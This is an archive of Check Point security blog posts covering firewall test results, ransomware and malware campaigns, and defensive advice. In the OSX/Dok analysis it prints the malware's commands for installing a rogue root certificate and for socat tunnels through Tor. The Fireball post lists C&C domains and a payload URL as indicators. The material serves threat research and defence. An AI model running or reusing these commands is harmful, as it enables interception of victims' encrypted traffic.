Category Archives: Check Point

  • 0

Check Point Infinity NGFW Earns NSS “Recommended” Yet Again for Security Effectiveness and Value

Category : Check Point

NSS Labs, Inc. released their results for the 2017 Next Generation Firewall Test, recognizing Check Point Infinity NGFW with “Recommended” rating. This marks our sixth NGFW “Recommended” rating for security effectiveness and value, and the fourteenth NSS “Recommended” rating overall since 2011.

This reinforces the Check Point Infinity goal of delivering the most effective and efficient security to customers across all network segments, with a Security Effectiveness Score of 99.56% in this test.

Key Check Point results from NSS Labs 2017 NGFW report include:

  • 100% protection against recent attacks (2013 – 2016) and against Apple, IBM and Oracle vulnerabilities
  • 99.9% protection against Microsoft and 99.2% protection against Adobe vulnerabilities
  • $18 TCO per Protected-Mbps

Download a copy of the NSS Labs NGFW Test Report and the Security Value Map™ for Next Generation Firewall (NGFW) today to learn how Check Point Infinity continually delivers advanced security protections at exceptional value to keep your businesses protected against any threat, anytime and anywhere.



  • 0

Anatomy of the Jaff Ransomware Campaign

Category : Check Point

Last month, Check Point researchers were able to spot the distribution of Jaff Ransomware by the Necurs Botnet. The ransomware was spread using malicious PDF files that had an embedded docm file, which in its turn downloaded an encoded executable. After the downloaded file was decoded, the ransomware encrypted the user’s files. In the last weeks, however, we were able to detect a new spam campaign delivering the ransomware and altering the chain of infection to use malicious WSF files.

 New Campaign

On May 28, Check Point SandBlastZero-Day Protection solution caught 8,000 messages delivering the ransomware, titled “Scanned Image from a Xerox WorkCentre,” a title which was in use in old spam campaigns dating back to 2013.

Previous Campaign                               Current Campaign















Infection Chain

A zipped folder including a WSF file is attached to the spam messages in the new Jaff campaign. The WSF file contains an obfuscated JavaScript, which parses various encoded strings; including hardcoded URLs from which it attempts to download the Jaff ransomware executable:

When the ransomware executes, a “.wlu” extension is appended to encrypted files’ names, as in a former Jaff campaign. In addition, the ransom note, which differs from former campaigns, is displayed on the victim’s screen.

The ransomware’s decryptor service must be accessed through the Tor Browser, as in the last Jaff campaign, and the requested ransom amount is 0.5486BTC (approximately 1530USD, June 7), lower than what was demanded by the Jaff distributers in previous campaigns.

Given the fact that the ransomware is still also being delivered by the Necurs Botnet using PDF files with embedded docm files, the recent changes mentioned in this article can suggest that Jaff may be functioning as a RaaS (Ransomware-as-a-Service), distributed by several threat actors.

Check Point customers are protected from Jaff ransomware by SandBlast, IPS, Anti-Bot and Anti-Virus.

The IPS signature that protects against this campaign is: “Suspicious Microsoft Office File Archive Mail Attachment”.

Anti-Virus and Anti-Bot signatures include Trojan-ransom.Win32.Jaff.*.


  • 0

Check Point Defeats Mobile Cyberattacks

Category : Check Point

Advanced cybercrimes aren’t science fiction; they’re real – and have real consequences. Check Point is at the forefront of mobile security, ensuring that devices and data everywhere remain safe. We don’t just build cutting edge technology: we stand behind it, with the largest team of elite researchers and security engineers in the industry, who have the experience to keep you one step ahead of mobile threats. Check Point proudly delivers Mobile Threat Prevention to enterprises around the world.


  • 0

FIREBALL – The Chinese Malware of 250 Million Computers Infected

Category : Check Point

Check Point Threat Intelligence and research teams recently discovered a high volume Chinese threat operation which has infected over 250 million computers worldwide. The installed malware,  Fireball, takes over target browsers and turns them into zombies. Fireball has two main functionalities:  the ability of running any code on victim computers–downloading any file or malware, and  hijacking and manipulating infected users’ web-traffic to generate ad-revenue. Currently, Fireball installs plug-ins and additional configurations to boost its advertisements, but just as easily it can turn into a prominent distributor for any additional malware.

This operation is run by Rafotech, a large digital marketing agency based in Beijing. Rafotech uses Fireball to manipulate the victims’ browsers and turn their default search engines and home-pages into fake search engines. This redirects the queries to either or The fake search engines include tracking pixels used to collect the users’ private information. Fireball has the ability to  spy on victims, perform efficient malware dropping, and execute any malicious code in the infected machines, this creates a massive security flaw in targeted machines and networks.



  • Check Point analysts uncovered a high volume Chinese threat operation which has infected over 250 million computers worldwide, and 20% of corporate networks.
  • The malware, called Fireball, acts as a browser-hijacker but and can be turned into a full-functioning malware downloader. Fireball is capable of executing any code on the victim machines, resulting in a wide range of actions from stealing credentials to dropping additional malware.
  • Fireball is spread mostly via bundling i.e. installed on victim machines alongside a wanted program, often without the user’s consent.
  • The operation is run by Chinese digital marketing agency.
  • Top infected countries are India (10.1%) and Brazil (9.6%)


Figure 1: Fireball Infection Flow




The scope of the malware distribution is alarming. According to our analysis, over 250 million computers worldwide have been  infected: specifically,  25.3 million infections in India (10.1%), 24.1 million in Brazil (9.6%), 16.1 million in Mexico (6.4%), and 13.1 million in Indonesia (5.2%). The United States has  witnessed 5.5 million infections (2.2%).

Based on Check Point’s global sensors,  20% of all corporate networks are affected . Hit rates in the US (10.7%) and China (4.7%) are alarming;but Indonesia (60%), India (43%) and Brazil (38%) have much more dangerous hit rates.

Another indicator of the incredibly high infection rate is the popularity of Rafotech’s fake search engines. According to Alexa’s web traffic data, 14 of these fake search engines are among the top 10,000 websites, with some of them occasionally reaching the top 1,000.

Figure 2: Fireball Global Infection Rates (darker pink = more infections)


Ironically, although Rafotech doesn’t admit it produces browser-hijackers and fake search engines, it does (proudly) declare itself a successful marketing agency, reaching 300 million users worldwide – coincidentally similar to our number of estimated infections.

Figure 3: Rafotech’s Advertisement on the Company’s Official Website



Fireball and similar browser-hijackers are hybrid creatures, half seemingly legitimate software (see the GOING UNDER THE RADAR section), and half malware. Although Rafotech  uses Fireball only for advertising and initiating traffic to its fake search engines, it  can perform any action on the victims’ machines These actions  can have serious consequences. How severe is it? Try to imagine a pesticide armed with a nuclear bomb. Yes, it can do the job, but it can also do much more.

These browser-hijackers are  capable on the browser level. This means that they can drive victims to malicious sites, spy on them and conduct successful malware dropping.

From a technical perspective, Fireball displays great sophistication and quality evasion techniques, including anti-detection capabilities, multi-layer structure and a flexible C&C– it is not inferior to a typical malware.

Many threat actors would like to have  a fraction of Rafotech’s power, as Fireball provides a critical backdoor, which can be further exploited.



While the distribution of Fireball is both malicious and illegitimate, it actually carries digital certificates imparting them a legitimate appearance. Confused? You should be.

Rafotech carefully walks along the edge of legitimacy, knowing that adware distribution is not considered a crime like malware distribution is. How is that? Many companies provide software or services for free, and make their profits by harvesting data or presenting advertisements. Once a client agrees to the installment of extra features or software to his/her computer, it is hard to claim malicious intent on behalf of the provider.

This gray zone led to the birth of a new kind of monetizing method – bundling. Bundling is when a wanted program installs another program alongside it, sometimes with a user’s authorization and sometimes without. Rafotech uses bundling in high volume to spread Fireball.


Figure 4: Bundling in Action


According to our analysis, Rafotech’s distribution methods appear to be illegitimate and don’t follow the criteria which would allow these actions to be considered naïve or legal. The malware and the fake search engines don’t carry indicators connecting them to Rafotech, they cannot be uninstalled by an ordinary user, and they conceal their true nature.

So how do they carry digital certificates? One possibility is that issuers make their living from providing certificates, and small issuers with flexible ethics can enjoy the lack of clarity in the adware world’s legality to approve software such as Rafotech’s browser-hijackers.

As with other types of malware, there are many ways for Fireball to spread. We suspect that two popular vectors are bundling the malware to other Rafotech products – Deal Wifi and Mustang Browser – as well as bundling via other freeware distributors: products such as “Soso Desktop”, “FVP Imageviewer” and others.

It’s important to remember that when a user installs freeware, additional malware isn’t necessarily dropped at the same time. If you download a suspicious freeware and nothing happens on the spot, it doesn’t necessarily mean that something isn’t happening behind the scenes.

Furthermore, it is likely that Rafotech is using additional distribution methods, such as spreading freeware under fake names, spam, or even buying installs from threat actors.

As with everything in the internet, remember that there are no free lunches. When you download freeware, or use cost-free services (streaming and downloads, for example), the service provider is making profit somehow. If it’s not from you or from advertisements, it will come from somewhere else.


Figure 5: Deal Wifi Installation Screen



To check if you’re infected, first open your web browser. Was your home-page set by you? Are you able to modify it? Are you familiar with your default search engine and can modify that as well? Do you remember installing all of your browser extensions?

If the answer to any of these questions is “NO”, this is a sign that you’re infected with adware. You can also use a recommended adware scanner, just to be extra cautious.

Figure 6:; a Fake Search Engine Run by Rafotech




It doesn’t take much to imagine a scenario in which Rafotech decides to harvest sensitive information from all of its infected machines, and sell this data to threat groups or business rivals. Banking and credit card credentials, medical files, patents and business plans can all be widely exposed and abused by threat actors for various purposes. Based on our estimated infection rate, in such a scenario, one out of five corporations worldwide will be susceptible to a major breach. Severe damage can be caused to key organizations, from major service providers to critical infrastructure operators to medical institutions. The potential loss is indescribable, and repairing the damage caused by such massive data leakage (if even possible) could take years.

Rafotech holds the power to initiate a global catastrophe and it is not alone. During our research we’ve tracked down additional browser-hijackers that, to our understanding, were developed by other companies. One such company is ELEX Technology, an Internet Services company also based in Beijing  produces products similar to those of Rafotech. Several findings lead us to suspect that the two companies are related, and may be collaborating in the distribution of browser-hijackers or in trading customers’ traffic. For example, an adware developed by ELEX, named YAC (“Yet Another Cleaner”) is suspected to be connected to Rafotech’s operation, dropping its browser-hijackers.



In this research we’ve described Rafotech’s browser-hijackers operation – possibly the largest infection operation in history. We believe that although this is not a typical malware attack campaign, it has the potential to cause irreversible damage to its victims as well as worldwide internet users, and therefore it must be blocked by security companies.

The full distribution of Fireball is not yet known, but it is clear that it presents a great threat to the global cyber ecosystem. With a quarter billion infected machines and a grip in one of every five corporate networks, Rafotech’s activities make it an immense threat.



To remove almost any adware, follow these simple steps:

  1. Uninstall the adware by removing the application from the Programs and Features list in the Windows Control Panel.


For Mac OS users:

  1. Use the Finder to locate the Applications
  2. Drag the suspicious file to the Trash.
  3. Empty the Trash.


Note – A usable program is not always installed on the machine and therefore may not be found on the program list.


  1. Scan and clean your machine, using:
  • Anti-Malware software
  • Adware cleaner software


  1. Remove malicious Add-ons, extensions or plug-ins from your browser:
On Google Chrome:a.       Click the Chrome menu icon and select Tools > Extensions.

b.      Locate and select any suspicious Add-ons.

c.       Click the trash can icon to delete.


On Internet Explorer:a.       Click the Setting icon and select Manage Add-ons.

b.      Locate and remove any malicious Add-ons.

On Mozilla Firefox:a.       Click the Firefox menu icon and go to the Tools tab.

b.      Select Add-ons > Extensions.

A new window opens.

c.       Remove any suspicious Add-ons.

d.      Go to the Add-ons manager > Plugins.

e.      Locate and disable any malicious plugins.


On Safari:a.       Make sure the browser is active.

b.      Click the Safari tab and select preferences.

A new window opens.

c.       Select the Extensions tab.

d.      Locate and uninstall any suspicious extensions.



  1. Restore your internet browser to its default settings:
On Google Chrome:a.       Click the Chrome menu icon, and select Settings.

b.      In the On startup section, click Set Pages.

c.       Delete the malicious pages from the Startup pages list.

d.      Find the Show Home button option and select Change.

e.      In the Open this page field, delete the malicious search engine page.

f.        In the Search section, select Manage search engines.

g.       Select the malicious search engine page and remove from the list.

On Internet Explorer:a.       Select the Tools tab and then select Internet Options.

A new window opens.

b.      In the Advanced tab, select Reset.

c.       Check the Delete personal settings box.

d.      Click the Reset button.

On Mozilla Firefox:a.       Enable the browser Menu Bar by clicking the blank space near the page tabs.

b.      Click the Help tab, and go to Troubleshooting information.

A new window opens.

c.       Select Reset Firefox.

On Safari:a.       Select the Safari tab and then select Preferences.

A new window opens.

b.      In the Privacy tab, the Manage Website Data… button.

A new window opens.

c.       Click the Remove All button.







C&C addresses

  • attirerpage[.]com
  • s2s[.]rafotech[.]com
  • trotux[.]com
  • startpageing123[.]com
  • funcionapage[.]com
  • universalsearches[.]com
  • thewebanswers[.]com
  • nicesearches[.]com
  • youndoo[.]com
  • giqepofa[.]com
  • mustang-browser[.]com
  • forestbrowser[.]com
  • luckysearch123[.]com
  • ooxxsearch[.]com
  • search2000s[.]com
  • walasearch[.]com
  • hohosearch[.]com
  • yessearches[.]com
  • d3l4qa0kmel7is[.]cloudfront[.]net
  • d5ou3dytze6uf[.]cloudfront[.]net
  • d1vh0xkmncek4z[.]cloudfront[.]net
  • d26r15y2ken1t9[.]cloudfront[.]net
  • d11eq81k50lwgi[.]cloudfront[.]net
  • ddyv8sl7ewq1w[.]cloudfront[.]net
  • d3i1asoswufp5k[.]cloudfront[.]net
  • dc44qjwal3p07[.]cloudfront[.]net
  • dv2m1uumnsgtu[.]cloudfront[.]net
  • d1mxvenloqrqmu[.]cloudfront[.]net
  • dfrs12kz9qye2[.]cloudfront[.]net
  • dgkytklfjrqkb[.]cloudfront[.]net
  • dgkytklfjrqkb[.]cloudfront[.]net/main/trmz[.]exe


File Hashes

  • FAB40A7BDE5250A6BC8644F4D6B9C28F
  • 69FFDF99149D19BE7DC1C52F33AAA651
  • B56D1D35D46630335E03AF9ADD84B488
  • 8C61A6937963507DC87D8BF00385C0BC
  • 7ADB7F56E81456F3B421C01AB19B1900
  • 84DCB96BDD84389D4449F13EAC75098
  • 2B307E28CE531157611825EB0854C15F
  • 7B2868FAA915A7FC6E2D7CC5A965B1E


  • 0

Securing the Connected Car Steps Up a Gear

Category : Check Point

Here in my car, I feel safest of all …” That line from Gary Numan’s hit single, ‘Cars’ sums up the way many of us feel when we’re driving: safe and protected in the privacy of our vehicles. But cars are increasingly connected to the outside world. Features that were once only available on premium luxury brands are now available across manufacturers’ model ranges, in basic city cars. These features include Bluetooth connectivity for pairing mobile phones, GPS navigation, 4G wifi hotspots, collision avoidance systems, remote diagnostics and more. In fact, with these capabilities, cars are rapidly becoming data networks on wheels.

The production of new cars equipped with data connectivity, either through a built-in communications module or by a tether to a mobile device, was forecast by Gartner to reach 12.4 million during 2016, increasing to 61 million in 2020 – representing nearly 70% of all cars shipped globally. This external connectivity is also mirrored in cars’ control systems, with even basic vehicles now using multiple electronic control units containing millions of lines of code, controlling all aspects of the car from engine management, to the brakes, steering and entertainment systems. But as development of the electronically controlled, connected car, sped up, security was left behind.

Over the past couple of years, researchers have repeatedly demonstrated how connected cars can be hacked and controlled from afar – in particular in 2015 when two white-hat hackers remotely took control of a Jeep Cherokee. This incident prompted Chrysler to recall 1.4 million vehicles. While a malicious cyberattack on a vehicle has yet to take place, the potential danger is real – so much so that the FBI, Department of Transportation, and National Highway Traffic Safety Administration issued a memo warning of the dangers to connected vehicles – including hackers disabling a vehicle’s brakes or steering, shutting the engine down, or manipulating other on-board systems. The report states, “These cars have become moving endpoints which continue to stay defenseless. Their mobility and distinct entry points pose significant difficulties to protect them. Just imagine trying to guard a moving castle which has to allow visitors in from several different avenues.”

To address this increasingly complex challenge, Check Point, HDBaseT Alliance and Valens are revving up their engines and joining forces to develop the best solution for protecting connected cars. Today, we announced that we are joining HDBaseT Alliance’s Automotive Working Group to define new cyber-security industry standards and co-develop solutions for the next generation of connected automobiles.

Check Point will lead the Cyber Security Working Group, and Valens, inventor of HDBaseT and HDBaseT Alliance founder, will play a central role in the collaboration to accelerate design and development of these requirements. Argus Cyber Security, the world’s largest independent automotive cyber security company, is also joining the Alliance, and will be the first company to join the Cyber Security Working Group.

Issues that the working group will address include: how to guarantee the connected car’s robust network configuration and segregation, firewalling, security level ranking, and securing external communications and 3rd Party solutions.

While in-vehicle connectivity continues to advance, and new technologies become available, we must address the advanced cybersecurity risks they pose. Security for the connected car is no longer optional, it’s a lifesaver – for drivers, other road users and pedestrians too. By joining the HDBaseT Alliance, we intended to steer the design of the best security solutions for today and tomorrow’s car industry, to be one step ahead of automotive threats – delivering security that moves even faster than hackers can.

  • 0

Hacked in Translation – from Subtitles to Complete Takeover

Category : Check Point

Check Point researchers revealed a new attack vector which threatens millions of users worldwide – attack by subtitles. By crafting malicious subtitle files, which are then downloaded by a victim’s media player, attackers can take complete control over any type of device via vulnerabilities found in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time and We estimate there are approximately 200 million video players and streamers that currently run the vulnerable software, making this one of the most widespread, easily accessed and zero-resistance vulnerability reported in recent years.

What is it?

Perpetrators use various methods, also referred to as ‘attack vectors’, to deliver cyberattacks. These attack vectors can be divided into two major categories: Either the attacker persuades the user to visit a malicious website, or he tricks him into running a malicious file on his computer.
Our research reveals a new possible attack vector, using a completely overlooked technique in which the cyberattack is delivered when movie subtitles are loaded by the user’s media player. These subtitles repositories are, in practice, treated as a trusted source by the user or media player; our research also reveals that those repositories can be manipulated and be made to award the attacker’s malicious subtitles a high score, which results in those specific subtitles being served to the user. This method requires little or no deliberate action on the part of the user, making it all the more dangerous.
Unlike traditional attack vectors, which security firms and users are widely aware of, movie subtitles are perceived as nothing more than benign text files. This means users, Anti-Virus software, and other security solutions vet them without trying to assess their real nature, leaving millions of users exposed to this risk.

What is the root cause?

The attack vector relies heavily on the poor state of security in the way various media players process subtitle files and the large number of subtitle formats. To begin with, there are over 25 subtitle formats in use, each with unique features and capabilities. Media players often need to parse together multiple subtitle formats to ensure coverage and provide a better user experience, with each media player using a different method. Like other, similar situations which involve fragmented software, this results in numerous distinct vulnerabilities.

What’s the effect?

Scope: The total number of the affected users is in the hundreds of millions. Each of the media players found to be vulnerable to date has millions of users, and we believe other media players could be vulnerable to similar attacks as well. VLC has over 170 million downloads of its latest version alone, which was released June 5, 2016. Kodi (XBMC) has reached over 10 million unique users per day, and nearly 40 million unique users each month. No current estimates exist for Popcorn Time usage, but it’s safe to assume that the number is likewise in the millions.

Damage: By conducting attacks through subtitles, hackers can take complete control over any device running them. From this point on, the attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device. The potential damage the attacker can inflict is endless, ranging anywhere from stealing sensitive information, installing ransomware, mass Denial of Service attacks, and much more.

Which media players are affected?

To date, we tested and found vulnerabilities in four of the most prominent media players: VLC, Kodi, Popcorn Time and Stremio. We have reason to believe similar vulnerabilities exist in other media players as well. We followed the responsible disclosure guidelines and reported all vulnerabilities and exploits to the developers of the vulnerable media players. Some of the issues were already fixed, while others are still under investigation. To allow the developers more time to address the vulnerabilities, we’ve decided not to publish any further technical details at this point.

Platforms Update:

IPS Signatures:

  • Popcorn Time Subtitles Remote Code Execution
  • Kodi Open Subtitles Addon Remote Code Execution
  • VLC ParseJSS Null Skip Subtitle Remote Code Execution
  • Stremio Subtitles Remote Code Execution

How can this attack vector spread?

Delving even further into the subtitle supply chain produced some interesting results. There are a number of shared online repositories, such as, that index and rank movie subtitles. Some media players download subtitles automatically; these repositories hold extensive potential for attackers. Our researchers were also able to show that by manipulating the website’s ranking algorithm, we could guarantee crafted malicious subtitles would be those automatically downloaded by the media player, allowing a hacker to take complete control over the entire subtitle supply chain, without resorting to a Man in the Middle attack or requiring user interaction. This vulnerability also affects users who use these rankings to decide which subtitles to download manually.



Below is a Proof-of-Concept video, demonstrating how an attacker can use malicious subtitles to take over your machine.

  • 0

Global Ransomware Attack “WannaCry” Still Infecting Organizations in 150+ countries

Category : Check Point

Ransomware cyber attacks are quickly becoming the preferred method of attack by cybercriminals. WannaCry, the latest global incident, is particularly damaging because it is also a worm—not just a ransomware program. As a result, it looks for other computers to spread to. When it infects a new computer, it encrypts the data and locks out the owner until a minimum of $300 in bitcoin is paid. To achieve its unprecedented rate of circulation across networks, WannaCry ransomware utilizes a Windows OS vulnerability that was recently exposed as part of the leaked NSA hacker tools.

The good news: Check Point SandBlast and Anti-Ransomware solutions protect against the WannaCry attack

The threat extraction component strips the malware that is embedded in the infected phishing emails, and the solutions block malware from reaching endpoint devices and encrypting files. In addition, Check Point IPS and anti-malware solutions block the exploits included in the malware. This gives organizations time needed to patch any vulnerable systems.

Learn how to prevent ransomware attacks against your organization. Read the whitepaper to discover:

  • The latest approaches used by cybercriminals
  • Why traditional approaches to security are not enough; and
  • The key steps to take to keep your organization safe.

Download White Paper

  • 0

DiamondFox modular malware – a one-stop shop

Category : Check Point

Check Point researchers have conducted a thorough investigation of the DiamondFox malware-as-a-service in collaboration with Terbium Labs, a Dark Web Data Intelligence company. The report includes a review of the malware’s sales procedure and customer reviews, as well as a full technical analysis of its multiple plugins. For the full DiamondFox report click here.

Check Point Threat Intelligence teams constantly track the latest attack trends, campaigns and attack methods to maintain an up-to-date and  accurate view of the cyber threat landscape.

In recent years, an effective new business method has penetrated the thriving malware and attack tools market and led to the establishment of an entire industry – malware-as-a-service. This provides unskilled threat actors an easy entrance to the cyberattack world, and enables each user to start their own attack campaign without any technical knowledge. Drive-by attack methods, ransomware, banking Trojans and a variety of attack tools are now traded in underground forums and use a wide range of payment methods.

DiamondFox, a modular botnet offered for sale on various underground forums, is an outstanding demonstration of the many advantages of this business module. By purchasing a single product, the buyer is granted access to a variety of capabilities, in the form of plugins, and can plan and execute multiple campaigns: a tailored espionage campaign, a credentials theft campaign, which can be the basis of an extensive monetary theft operation, and even a simple, yet highly effective distributed denial of service (DDoS) attack.

Together with Terbium Labs, a Dark Web Data Intelligence company, we reviewed the DiamondFox malware’s capabilities, sales procedure and user experience. This report also includes a full technical analysis of the malware’s functionality, network communications and multiple plugins.

 Malware ecosystem

Looking at the full list of capabilities of the latest version of DiamondFox, the Crystal version, this highly modular malware seems to cover everything from keylogging and browser password stealing, all the way to a variety of Distributed Denial of Service (DDoS) attack techniques through crypto currency wallet stealing. DiamondFox, one of the trendiest malware-as-a-service up for sale these days, is in fact a one-stop-shop: upon purchasing the malware for a certain period, a selection of plugins becomes accessible. All that’s left for the buyer to do is to choose which one to activate for each victim and when.

DiamondFox advertisement, dated April 2016

The ad displayed above, which presents the latest version of DiamondFox, includes a detailed explanation about the malware loader, the user panel and the actual core of DiamondFox – the plugins.

It also includes a carefully updated Changelog, which provides the potential buyers a detailed explanation about the improvements and features added to each of the versions.

At this point, after examining the highly successful Cerber Ransomware-as-a-service and the user-friendly Sundown Exploit Kit, there is no need to elaborate about the management panel granted to each user who purchases the malware. It goes without saying that the DiamondFox user panel is comprehensive and secured, and provides users real-time infection statistics as well as control over the activation of the plugins. Moreover, most of the DiamondFox advertisements guarantee free updates and support.

DiamondFox user panel screenshots

DiamondFox user panel screenshots, single victim view

So far, the DiamondFox botnet seems like the perfect solution for any actor seeking an easy way to initiate their own campaigns. DiamondFox offers a range of plugins, which provide the user several data theft possibilities, and the ability to self-spread via removable devices and social networks. DiamondFox can definitely be used as the basis of a monetary theft operation, or a tailored espionage campaign. Furthermore, it appears that the official malware vendor, an actor dubbed ‘Edbitss’, is truly invested in the improvement of the malware, as all updates, changes and fixes are carefully documented and shared with the potential buyers. Edbitss is clearly very responsive in all of the observed threads. Several customer reviews validate this impression and describe a quality, fully functioning product:

DiamondFox customer review

However, other reviews tell an entirely different story:

DiamondFox customer review

We can’t help but wonder which side is telling the truth.

As mentioned previously, Edbitss is the official DiamondFox vendor, based on evidence from the ads referred to in this report. The actor uses the same Jabber address in all of the observed ads, both on the clear web and on the Darknet: However, different contact details were observed throughout the various ads, each using a top level domain linking the actor to another country. The actor claims to be located in Russia and appears to be fluent in Russian. However during the investigation, we came across a clear web landing page established by the actor in March 2016, on the domain ‘’, the Mexican website of the highly popular blog-publishing service. From this, there is a high possibility the actor could live in Mexico.

Check Point customers are protected from DiamondFox by the following security technologies:

  • The Antivirus Software Blade blocks every currently known variant of DiamondFox.
  • The Anti-Bot Software Blade detects and blocks any attempt to communicate with DiamondFox’s C&C addresses.
  • Indicators of Compromise are provided in the DiamondFox report and the detailed Appendices.

  • 0

Ransomware– Not Only File Encryption

Category : Check Point

Ransomware is an ever-increasing threat worldwide, claiming new victims on a regular basis with no end in sight. While most ransomware families prevent the victims from accessing their documents, pictures, databases and other files by encrypting them and offering a decryption key in return for a ransom payment, others use different, but no less creative ways to extract payment from their victims. Here are some examples:


 IoT ransomware

Smart devices are known to be a soft spot targeted by threat actors for various purposes. In August 2016, security researchers demonstrated their ability to take control of a building’s thermostats and cause them to increase the temperature up to 99 degrees Celsius. This was the first proof of concept of this kind of attack, showing a creative way to put pressure on victims and drive them to pay ransom or risk consequences such as a flood or an incinerated house.

In November 2016, travelers in the San Francisco MUNI Metro were prevented from buying tickets at the stations due to a ransomware attack on MUNI’s network. In this case the attackers demanded $70,000 in BitCoins. In January 2017, a luxurious hotel in Austria was said to suffer an attack on its electronic key system, resulting in guests experiencing difficulties in going in or out of their rooms. The attackers demanded $1,500 in BitCoins. Whether or not this story is accurate, it demonstrates how creative this type of attack can get.

The growing use of IoT devices will likely make this attack vector more and more common in the future. For example, the potential exploitation of vulnerabilities inside smart, implantable cardiovascular defibrillators, can allow an attacker to put a victim’s life at risk until the ransom is paid. As IoTs become more widespread in our everyday life, threat actors will find new, horrifying ways to subjugate victims for profit.



Hostage data ransomware

A more direct approach is to steal data from victims and threaten to expose it unless a ransom payment is received by a certain deadline. This generic modus operandi has been used by different malware families and campaigns. For example, in May 2016, over 10 million customer records of a leading South Korean online shopping mall were stolen, including names, addresses and phone numbers. The attackers demanded a ransom of $2,664 in BitCoins to prevent release of the information online.

Another example is Charger, a screen-locker Android ransomware discovered by Check Point researchers in January 2016. The attackers threatened to sell stolen data from targeted devices unless they receive a ransom of 0.2 BitCoins (approximately $180). The malware is embedded in a mobile app named EnergyRescue, downloaded from Google Play.


DDoS ransomware

Another method for attackers is threatening to conduct a denial of service attack unless a ransom is paid. With the growing use of botnets for DDoS attacks, this attack vector is especially common against banks, and is very attractive as it is far simpler than developing a ‘traditional’ file-encrypting ransomware. This attack vector made headlines in January 2017 when it was used in an attack against the web portal of the British Lloyds Bank. The attackers issued a DDoS threat with a demand of 100 BitCoins (worth approximately $94,000).



Screen lockers

Some ransomware simply prevent victims from using their devices by locking their screens. There are different ways to conduct a screen locking attack, but common features include cancelling all options to close a program or to shut it down.

Examples of such ransomware are DeriaLock (December 2016), which targets PCs and demands a payment of $30 for unlocking; and Flocker (May 2015), an Android screen locker which targets smartphones and Android-run smart TVs, and demands an iTunes gift card worth $200 as payment.




Ransomware attacks are a popular way for threat actors to make easy profits, as the payment is made anonymously using anonymous BitCoin wallets rather than bank transfers. The motivation for victims to cooperate is high, as their personal data is on the line. While most ransomware families encrypt files, some use creative ways to drive victims to pay. By preventing victims from accessing their machines, creating real damage or exposing sensitive data, the attackers are able to bypass the complexities of managing an encryption and decryption process.

 We estimate that the use of alternative ransomware, especially DDoS and IoT ransomware, will keep on growing in the near future, as IoT devices and web services continue to become more widespread.


How to protect yourself

We highly recommend you take these steps to protect yourself from ransomware or mitigate their effects:

  • Backup your most important files – Make an offline copy of your files on an external device and an online cloud stage service. This method protects your files not only from ransomware but from other hazards as well. Note: external devices should be used for backup ONLY and be disconnected immediately after the backup is completed.
  • Exercise caution – We usually don’t sense any danger while using our computers or other devices, but it’s there. Threat actors are constantly trying to steal your money, your private data and your machine resources – don’t let them have it. Don’t open e-mails you don’t expect to receive, don’t click links unless you know exactly what they are and where they lead, and if you are asked to run macros on an Office file, DON’T! The only situation in which you should run macros is in the rare case that you know exactly what those macros will do. Additionally, keep track of the latest major malware campaigns to ensure that you will not fall victim to a new and unique phishing technique or download a malicious app, which can lead to malware installation on your computer or theft of your credentials.
  • Have a comprehensive, up-to-date, security solution – High quality security solutions and products protect you from a variety of malware types and attack vectors. Today’s Anti-Virus, IPS and sandboxing solutions can detect and block Office documents that contain malicious macros, and prevent many exploit kits from exploiting your system even prior to the malware infection. Check Point Sandblast solution efficiently detects and blocks ransomware samples, and extracts malicious content from files delivered by spam and phishing campaigns. Installing your IoT devices behind a Security Gateway will keep them safe as well.


  • 0

OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic

Category : Check Point

People often assume that if you’re running OSX, you’re relatively safe from malware. But this is becoming less and less true, as evidenced by a new strain of malware encountered by the Check Point malware research team. This new malware – dubbed OSX/Dok — affects all versions of OSX, has 0 detections on VirusTotal (as of the writing of these words), is signed with a valid developer certificate (authenticated by Apple), and is the first major scale malware to target OSX users via a coordinated email phishing campaign.

Once OSX/Dok infection is complete, the attackers gain complete access to all victim communication, including communication encrypted by SSL. This is done by redirecting victim traffic through a malicious proxy server.

The malware mostly targets European users. For instance, one phishing message was observed to target a user in Germany by baiting the user with a message regarding supposed inconsistencies in their tax returns (see image, and translation, below).

Technical details:

The malware bundle is contained in a .zip archive named It was signed on April 21th 2017 by a “Seven Muller” and the bundle name is Truesteer.AppStore.

Upon execution, the malware will copy itself to the /Users/Shared/ folder, and will then proceed to execute itself from the new location by running the shell commands below:

Then, the malware will pop-up a fabricated message claiming that “the package is damaged” and therefore cannot execute:


If a loginItem named “AppStore” exists, the malware will delete it, and instead add itself as a loginItem, which will persist in the system and execute automatically every time the system reboots, until it finishes to install its payload.


The malicious application will then create a window on top of all other windows. This new window contains a message, claiming a security issue has been identified in the operating system that an update is available, and that to proceed with the update, the user has to enter a password as shown in the picture below. The malware checks the system localization, and supports messages in both German and English.


The victim is barred from accessing any windows or using their machine in any way until they relent, enter the password and allow the malware to finish installing. Once they do, the malware gains administrator privileges on the victim’s machine.

Using those privileges, the malware will then install brew, a package manager for OS X, which will be used to install additional tools – TOR and SOCAT

Tor, the latter is a low-level command-line utility that allows connection to the dark web.

The malware will then give the current user admin privileges immediately on demand without prompting for a password. This is done so that the malware won’t provoke constant admin password prompts when abusing its admin privileges with the sudo command. This is done by adding the following line to /etc/sudoers:


The malware then changes the victim system’s network settings such that all outgoing connections will pass through a proxy, which is dynamically obtained from a Proxy AutoConfiguration (PAC) file sitting in a malicious server. The script that makes this configuration changes can be seen below:

Then resulting change can be seen in the Network Settings:



The malware will then proceed to install a new root certificate in the victim system, which allows the attacker to intercept the victim’s traffic using a Man in The Middle (MiTM) attack. By abusing the victim’s new-found trust in this bogus certificate, the attacker can impersonate any website, and the victim will be none the wiser. The new certificate is installed using the following command:

security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/cert.der


The newly-installed certificate can be seen in the two images below.



The malware will also install 2 LaunchAgents that will start with system boot, and have the following names:




These LaunchAgents will redirect requests to through the dark web address “paoyu7gub72lykuk.onion”. This is necessary for the previous PAC configuration to work (note that the original configuration looks for the PAC file on the local host

These launchAgents consist of the following BASH commands:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050


